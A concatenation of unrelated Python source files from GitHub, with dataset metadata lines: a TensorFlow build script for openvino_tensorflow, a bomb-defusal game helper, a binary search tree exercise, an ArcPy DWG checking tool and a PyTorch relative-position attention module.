        help="Desired version of ABI to be used while building Tensorflow",
        default='1')
    parser.add_argument(
        '--resource_usage_ratio',
        help="Ratio of CPU / RAM resources to utilize during Tensorflow build",
        default=0.5)

    arguments = parser.parse_args()

    # Check bazel version: accept Bazelisk, otherwise require bazel >= 2.
    bazel_kind, bazel_ver = get_bazel_version()
    got_correct_bazel_version = bazel_kind == 'Bazelisk version'
    if (not got_correct_bazel_version and int(bazel_ver[0]) < 2):
        raise Exception("Need bazel version >= 2.0.0 \n" + "Got: " +
                        '.'.join(bazel_ver))

    # Create the output directory and sanity-check it before chdir-ing in.
    if not os.path.isdir(arguments.output_dir):
        os.makedirs(arguments.output_dir)
    if not os.path.isdir(arguments.output_dir):
        raise AssertionError("Did not find output directory: " +
                             arguments.output_dir)
    if not os.path.exists(arguments.output_dir):
        raise AssertionError("path doesn't exist {0}".format(
            arguments.output_dir))
    os.chdir(arguments.output_dir)

    # Platform-specific virtualenv location.
    if (platform.system() == 'Windows'):
        venv_dir = '.\\venv3\\'
    else:
        venv_dir = './venv3/'

    install_virtual_env(venv_dir)
    load_venv(venv_dir)
    setup_venv(venv_dir, arguments.tf_version)

    if not os.path.exists(arguments.output_dir):
        raise AssertionError("Directory doesn't exist {0}".format(
            arguments.output_dir))

    if not os.path.isdir(os.path.join(arguments.output_dir, "tensorflow")):
        # Download TensorFlow
        download_repo("tensorflow",
                      "https://github.com/tensorflow/tensorflow.git",
                      arguments.tf_version)
    else:
        # Sources already present: fetch and check out the requested version.
        pwd = os.getcwd()
        if not os.path.exists(arguments.output_dir):
            raise AssertionError("Path doesn't exist {}".format(
                arguments.output_dir))
        os.chdir(os.path.join(arguments.output_dir, "tensorflow"))
        call(["git", "fetch"])
        command_executor(["git", "checkout", arguments.tf_version])
        call(["git", "pull"])
        if not os.path.exists(pwd):
            raise AssertionError("Path doesn't exist {0}".format(pwd))
        os.chdir(pwd)

    # Build TensorFlow
    build_tensorflow(
        arguments.tf_version,
        "tensorflow",
        'artifacts',
        arguments.target_arch,
        False,
        arguments.use_intel_tensorflow,
        arguments.cxx11_abi_version,
        resource_usage_ratio=float(arguments.resource_usage_ratio))

    # Build TensorFlow C++ Library
    build_tensorflow_cc(arguments.tf_version, "tensorflow", 'artifacts',
                        arguments.target_arch, False,
                        arguments.use_intel_tensorflow,
                        arguments.cxx11_abi_version)

    pwd = os.getcwd()
    # Artifacts land in a platform-dependent location.
    if (platform.system() == 'Windows'):
        artifacts_dir = os.path.join(pwd, 'tensorflow')
    else:
        artifacts_dir = os.path.join(pwd, 'artifacts/tensorflow')
    os.chdir("tensorflow")

    copy_tf_to_artifacts(arguments.tf_version, artifacts_dir, None,
                         arguments.use_intel_tensorflow)

    print('\033[1;35mTensorFlow Build finished\033[0m')

    print(
        'When building openvino_tensorflow using this prebuilt tensorflow, use:'
    )
    print('\033[3;34mpython3 build_ovtf.py --use_tensorflow_from_location ' +
          os.path.abspath(arguments.output_dir) + '\033[1;0m')


if __name__ == '__main__':
    main()

# Usage
# Build TF once
# ./build_tf.py --tf_version v1.15.2 --output_dir /prebuilt/tf/dir
#
# Reuse TF in different openvino_tensorflow builds
# mkdir ovtf_1; cd ovtf_1
# git clone https://github.com/openvinotoolkit/openvino_tensorflow.git
# ./build_ovtf.py --use_tensorflow_from_location /prebuilt/tf/dir
# cd ..; mkdir ovtf_2; cd ovtf_2
# git clone https://github.com/openvinotoolkit/openvino_tensorflow.git
# ./build_ovtf.py --use_tensorflow_from_location /prebuilt/tf/dir
openvinotoolkit/openvino_tensorflow
build_tf.py
build_tf.py
py
4,841
python
en
code
176
github-code
36
1908225099
print("Enter the last digit of the serial number") serial = int(input()) serialeven = False if serial % 2 == 0: serialeven = True print("Enter the number of batteries on the bomb:") batteries = int(input()) print("Does the bomb have a parallel Port?(y/n)") hasParallel = False a = input() if a == "y": hasParallel = True for i in range(6): print(f"Cable nr {i+1}: Enter *,L,R,B as string") s = str.lower(input()) hasStar = False hasLED = False isRed = False isBlue = False if "*" in s: hasStar = True if "l" in s: hasLED = True if "r" in s: isRed = True if "b" in s: isBlue = True
TimoLob/KTANE-Bot
complicatedcable.py
complicatedcable.py
py
671
python
en
code
0
github-code
36
28078901449
# coding: utf-8 # Your code here! n = int(input().rstrip()) class Node: __slots__ = ['key', 'left', 'right', 'parent'] def __init__(self, key): self.key = int(key) self.left = self.right = self.parent = None root = None def insert(node): global root y, x = None, root while x != None: y = x if node.key < x.key: x = x.left else: x = x.right if y == None: root = node elif node.key < y.key: node.parent = y y.left = node else: node.parent = y y.right = node def find(key): global root node = root num = int(key) while node != None and node.key != num: if num < node.key: node = node.left else: node = node.right return node def delete(key): global root z = find(key) y = x = None if z.left == None or z.right == None: y = z else: y = getSuccessor(z) # 子の操作 if y.left != None: x = y.left else: x = y.right if x != None: x.parent = y.parent if y.parent == None: root = x elif y == y.parent.left: y.parent.left = x else: y.parent.right = x if y != z: z.key = y.key def getSuccessor(x): if x.right != None: return getMinimum(x.right) y = x.parent while y != None and x == y.right: x = y y = y.parent return y def getMinimum(node): while node.left != None: node = node.left return node def inOrder(node): return inOrder(node.left) + " " + str(node.key) + inOrder(node.right) if node else '' def preOrder(node): return " " + str(node.key) + preOrder(node.left) + preOrder(node.right) if node else '' for i in range(n): command = input().rstrip().split() if command[0] == "insert": insert(Node(command[1])) elif command[0] == "delete": delete(command[1]) elif command[0] == "find": if find((command[1])) is None: print("no") else: print("yes") elif command[0] == "print": print(inOrder(root)) print(preOrder(root))
negiandleek/til
aoj/ALDS1_8_A_Binary_Search_Tree_III.py
ALDS1_8_A_Binary_Search_Tree_III.py
py
2,320
python
en
code
0
github-code
36
3026799734
# -*- coding: utf-8 -*-
# Engine_main: QC-check a batch of DWG drawings (M1200/M1300 layers, blocks,
# declarations), write a CSV report and produce a PDF map per drawing.
import arcpy,math
import pandas as pd
import numpy as np
import uuid,json,datetime,sys,csv,os
from scipy.spatial import distance_matrix

# FIX: was `arcpy.env.overwriteOutPut` (misspelled attribute), which never
# enabled output overwriting; the real property is `overwriteOutput`.
arcpy.env.overwriteOutput = True

from Basic_Tools import *
from Engine_class import Layer_Engine

print_arcpy_message('# # # # # S T A R T # # # # #')

# # # Input # # #
# DWGS = [r"C:\GIS_layers\Vector\bad_DWG\14_1_2021\50552-1.dwg"]
DWGS = arcpy.GetParameterAsText(0).split(';')

# # # Prepare Data # # #
scriptPath = os.path.abspath (__file__)
folder_basic = os.path.dirname (scriptPath)
Tamplates = folder_basic + "\\" + "Tamplates"
GDB_file = folder_basic + "\\" + "Temp"

for DWG in DWGS:
    print_arcpy_message (DWG,1)
    # Per-drawing work paths: a scratch FGDB, CSV report, and templates.
    DWG_name = os.path.basename(DWG).split(".")[0]
    fgdb_name = Create_GDB (GDB_file,DWG_name)
    csv_name = GDB_file + '\\' + DWG_name +'.csv'
    mxd_path = Tamplates + '\\' + 'M1200_M1300.mxd'
    gdb_path = Tamplates + '\\' + 'temp.gdb'
    dwg_path = GDB_file + '\\' + DWG_name + '.dwg'

    # # # Get M1200 and M1300 to a layer # # #
    Polyline = DWG + '\\' + 'Polyline'
    Filter = "\"Layer\" IN('M1200','M1300')"
    layer_name = 'Line_M1200_M1300'
    layers_M1200_M1300 = Extract_dwg_to_layer (fgdb_name,Polyline,layer_name,Filter)

    # # # Get all blocks and declaration # # #
    Point = DWG +'\\' + 'Point'
    layer_name2 = 'Blocks'
    layers_Block = Extract_dwg_to_layer (fgdb_name,Point,layer_name2)
    declaration = fgdb_name + '\\' + 'declaration'
    arcpy.Select_analysis (layers_Block,declaration,"\"Layer\" in ('declaration','DECLARATION','Declaration')")

    # # # Get polygon M1200 and M1300, if not found, Create from Line # # #
    polygon = DWG +'\\' + 'Polygon'
    Filter3 = "\"Layer\" IN('M1200','M1300')"
    layer_name3 = "Poly_M1200_M1300"
    layers_Poly = fgdb_name + '\\' + layer_name3
    try:
        arcpy.FeatureClassToFeatureClass_conversion( polygon, fgdb_name, layer_name3, Filter3)
        print ('Create FeatureClassToFeatureClass_conversion')
    # Deliberate best-effort fallback: if the DWG exposes no Polygon data,
    # rebuild the polygons from the line layer instead.
    # (Narrowed from a bare `except:` so Ctrl-C etc. still propagate.)
    except Exception:
        print ('didnt Create FeatureClassToFeatureClass_conversion, trying creating polygon from line')
        # Create Polygon M1200
        poly_M1200 = 'in_memory' + '\\' + 'poly_M1200'
        Create_Polygon_From_Line (layers_M1200_M1300 ,poly_M1200 ,"\"Layer\" = 'M1200'","'M1200'")
        Create_Polygon_From_Line (layers_M1200_M1300,layers_Poly ,"\"Layer\" = 'M1300'","'M1300'")
        # Combine Polygons
        arcpy.Append_management (poly_M1200,layers_Poly, "NO_TEST")

    # # # Reading Files # # #
    blocks = Layer_Engine (layers_Block ,'all')
    delcar = Layer_Engine (declaration ,'all')
    lines_M = Layer_Engine (layers_M1200_M1300 ,["Layer","Entity","LyrHandle"])
    poly_M = Layer_Engine (layers_Poly ,'all')

    blocks.Extract_shape ()
    delcar.Extract_shape ()
    lines_M.Extract_shape ()

    # # # Action # # #
    # Run every QC check; each returns a list of CSV rows.
    cheak_version = cheak_cad_version (DWG)
    Check_decler = cheak_declaration (delcar,lines_M)
    check_Blocks = Check_Blocks (blocks,Point,lines_M)
    check_Lines = Check_Lines (lines_M)
    check_CADtoGeo = Cheak_CADtoGeoDataBase(DWG,fgdb_name)
    check_annotation = get_crazy_long_test (DWG)

    data_csv = cheak_version + Check_decler + check_Blocks + check_Lines + check_CADtoGeo + check_annotation

    Create_CSV (data_csv,csv_name)

    mxd_pdf_making (mxd_path,gdb_path,DWG_name,fgdb_name,GDB_file)

print_arcpy_message('# # # # # F I N I S H # # # # #')
medad-hoze/EM_3
Old/Engine_main.py
Engine_main.py
py
3,885
python
en
code
0
github-code
36
13019170409
import torch
import math
from torch import nn
import torch.nn.functional as F

# Relative-position self-attention (Shaw et al., 2018 style).
# Objective: learn an embedding vector for each "relative" position.
# Steps: (1) build the (len_q, len_k) matrix of clamped relative offsets,
#        (2) hold an embedding table over the vocabulary of possible offsets,
#        (3) look the offsets up in the table to get a per-pair embedding
#            (computed per sentence length, shared across sentences).


class RelativePosition(nn.Module):
    """Learned embedding table over clamped relative offsets.

    Vocabulary size is max_relative_position*2 + 1: `max` offsets to the
    left, `max` to the right, plus the zero offset (a token's relation to
    itself). The table is randomly initialized and learned like any
    nn.Embedding.
    """

    def __init__(self, max_relative_position, head_dim, device):
        super().__init__()
        self.head_dim = head_dim
        self.max_relative_position = max_relative_position
        # nn.Embedding(num_embeddings, emb_dim): output shape = input shape + (emb_dim,).
        self.embedding_table = nn.Embedding(max_relative_position*2 + 1, head_dim)
        self.device = device

    def forward(self, len_q, len_k):
        # For self-attention len_q == len_k == seq_len, but that is not assumed here
        # (cross-attention may have different query/key lengths).
        possible_relatives_1d_q = torch.arange(len_q)
        possible_relatives_1d_k = torch.arange(len_k)
        # Broadcast subtraction (row vector minus column vector):
        # entry [i, j] = j - i, the signed offset of key j relative to query i.
        possible_relatives_2d = possible_relatives_1d_k[None, :] - possible_relatives_1d_q[:, None]
        # Clamp offsets into [-max, +max]; relativity beyond the window is not
        # distinguished. shape: (len_q, len_k).
        clamped_relatives_2d = torch.clamp(possible_relatives_2d, -self.max_relative_position, self.max_relative_position)
        # Shift into [0, 2*max] so every offset is a valid (non-negative)
        # embedding index.
        clamped_relatives_positive = clamped_relatives_2d + self.max_relative_position
        # Embedding lookup requires integer (long) indices; move to the target device.
        clamped_relatives_positive = torch.LongTensor(clamped_relatives_positive).to(self.device)
        # Look up one head_dim vector per (query, key) offset.
        # shape: (len_q, len_k, head_dim)
        relative_position_embeddings = self.embedding_table(clamped_relatives_positive)
        return relative_position_embeddings


class RelativePositionalEmbedding(nn.Module):
    """Multi-head self-attention with relative-position terms.

    Implements eq. (5) (content-content qk plus content-position q·a_k scores)
    and eq. (3) (softmax-weighted values plus softmax-weighted a_v) of the
    relative-position attention formulation. No vocab size is needed: the
    offset vocabulary is derived from max_relative_position.
    """

    def __init__(self, emb_dim, n_heads, max_relative_position, dropout, device):
        super().__init__()
        self.dropout, self.max_relative_position = dropout, max_relative_position
        # Heads split the emb_dim vector: instead of one big embedding (e.g. 512)
        # each of n_heads works on a head_dim slice (e.g. 2 x 256).
        self.emb_dim, self.n_heads = emb_dim, n_heads
        self.head_dim = emb_dim // n_heads
        # Projections keep emb_dim -> emb_dim; the split into heads happens
        # during attention and the heads are re-concatenated before self.out.
        self.q_linear, self.k_linear, self.v_linear = nn.Linear(emb_dim, emb_dim), nn.Linear(emb_dim, emb_dim), nn.Linear(emb_dim, emb_dim)
        # NOTE(review): the mangled original is ambiguous about whether this line
        # was commented out; forward() calls self.out, so it must be defined.
        self.out = nn.Linear(emb_dim, emb_dim)  # output stays emb_dim (positional embedding, not vocab logits)
        self.relative_position_k = RelativePosition(max_relative_position, self.head_dim, device)
        self.relative_position_v = RelativePosition(max_relative_position, self.head_dim, device)
        self.scale_factor = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device)
        # Rebinds self.dropout from the float rate (stored above) to the module.
        self.dropout = nn.Dropout(dropout)

    def forward(self, q, k, v, atten_mask=None):
        # q/k/v shape: (batch_size, seq_len, emb_dim). atten_mask is currently unused
        # (masking code below is commented out pending a decision on its shape).
        # --------------------------------- Attention QK -----------------------
        # Beginning of Equation (5) --> e_ij
        # 1. normal self attention (qk) --> [ x*WQ * (x*WK)^T ]
        batch_size, len_q, len_k, len_v = q.shape[0], q.shape[1], k.shape[1], v.shape[1]
        q, k = self.q_linear(q), self.k_linear(k)
        # view splits emb_dim into (n_heads, head_dim); permute only transposes axes.
        q_heads = q.view(batch_size, -1 ,self.n_heads, self.head_dim)
        k_heads = k.view(batch_size, -1 ,self.n_heads, self.head_dim)
        # Move heads before sequence so matmul (which operates on the last two
        # dims) multiplies (len, head_dim) x (head_dim, len) per head.
        q_head_perm, k_head_perm = q_heads.permute(0, 2, 1, 3), k_heads.permute(0, 2, 1, 3)
        qk = torch.matmul(q_head_perm, k_head_perm.permute(0, 1, 3, 2))
        # qk shape: (batch_size, n_heads, len_q, len_k)

        # ----------------------- Relatives ------------------------
        # 2. Relative of k --> [a_k]
        r_k = self.relative_position_k(len_q, len_k)
        # r_k shape: (len_q, len_k, head_dim); transposed below to (len_q, head_dim, len_k)
        # Fold batch and heads together, with len_q leading, to batch-matmul
        # against the per-query-position r_k slices.
        q2_r = q_heads.permute(1, 0, 2, 3).contiguous().view(len_q, batch_size*self.n_heads, self.head_dim)
        q_rk = torch.matmul(q2_r, r_k.transpose(1, 2))
        # q_rk shape: (len_q, bsz*n_heads, len_k) -> restore batch/heads to front
        q_rk = q_rk.transpose(0, 1)
        q_rk = q_rk.contiguous().view(batch_size, self.n_heads, len_q, len_k)

        attn1, attn2 = qk, q_rk
        # Scale the summed scores by sqrt(head_dim).
        attn_total = (attn1 + attn2) / self.scale_factor
        # shape: (batch_size, n_heads, len_q, len_k)
        #if atten_mask is not None:  # TODO(review): confirm expected mask shape before enabling
        #    attn_total = attn_total.masked_fill(atten_mask == 0, -1e10)
        # End of Equation (5)

        # ------------------------ Value --------------------------
        # Begining of Equation (3)
        # 1. Softmax of total pre attention: alpha_ij = softmax (e_ij)
        attn_soft = self.dropout(F.softmax(attn_total, dim=-1))
        # shape: (batch_size, n_heads, len_q, len_k)

        # 3. Linear v --> x*W_v
        v = self.v_linear(v)
        v_heads = v.view(batch_size, -1, self.n_heads, self.head_dim)
        v_heads = v_heads.permute(0, 2, 1, 3)
        # v_heads shape: (batch_size, n_heads, seq_len, head_dim)

        # 4. Softmax * linear v --> alpha_ij * [x*W_v]
        weight1 = torch.matmul(attn_soft, v_heads)
        # shape: (batch_size, n_heads, len_q, head_dim)

        # 2. Relative position of v --> a_v
        r_v = self.relative_position_v(len_q, len_v)
        # r_v shape: (len_q, len_v, head_dim); for self-attention len_v == len_k
        attn_soft = attn_soft.permute(2, 0, 1, 3).contiguous().view(len_q, batch_size*self.n_heads, len_k)

        # 5. Softmax * relative v --> alpha_ij * [a_v]
        weight2 = torch.matmul(attn_soft, r_v)
        weight2 = weight2.transpose(0, 1).contiguous().view(batch_size, self.n_heads, len_q, self.head_dim)

        # 6. summation of (4) & (5), then merge heads back into emb_dim
        weights = weight1 + weight2
        weights = weights.permute(0, 2, 1, 3).contiguous().view(batch_size, -1, self.emb_dim)

        ### linear over summation ###
        out = self.out(weights)
        # out shape: (batch_size, len_q, emb_dim)
        return out


# Commented-out earlier draft kept from the original source (incomplete:
# k_relative/v_relative indexing was never filled in).
# class SelfAttention(nn.Module):
#     def __init__(self, emb_size, clip, seq_len):
#         self.emb_size = emb_size
#         self.q_linear = nn.Linear(emb_size, emb_size)
#         self.k_linear = nn.Linear(emb_size, emb_size)
#         self.v_linear = nn.Linear(emb_size, emb_size)
#         self.max_clip = max(-clip, min(seq_len, clip))
#         clip = self.clip
#     def forward(self, q, k, v, mask=None):
#         q, k, v = self.q_linear(q), self.k_linear(k), self.v_linear(v)
#         # eq(5.1) == eq(2) --> qk_scale
#         qk_scale = (torch.matmul(q, k.transpose(-2, -1)))/math.sqrt(self.emb_size)
#         # eq(5.2)
#         k_relative = k[]  # k[-] -- put clip?
#         qk_relative = (torch.matmul(q, k_relative.transpose(-1, -2)))/math.sqrt(self.emb_size)
#         qk_total = qk_scale + qk_relative
#         qk_total_soft = F.softmax(qk_total, dim=-1)
#         # eq(3)
#         v_relative = v[]
#         v_new = v + v_relative
#         qkv = torch.matmul(qk_total_soft, v_new)
hosnaa/bert-implement
src/relative_position.py
relative_position.py
py
10,928
python
en
code
0
github-code
36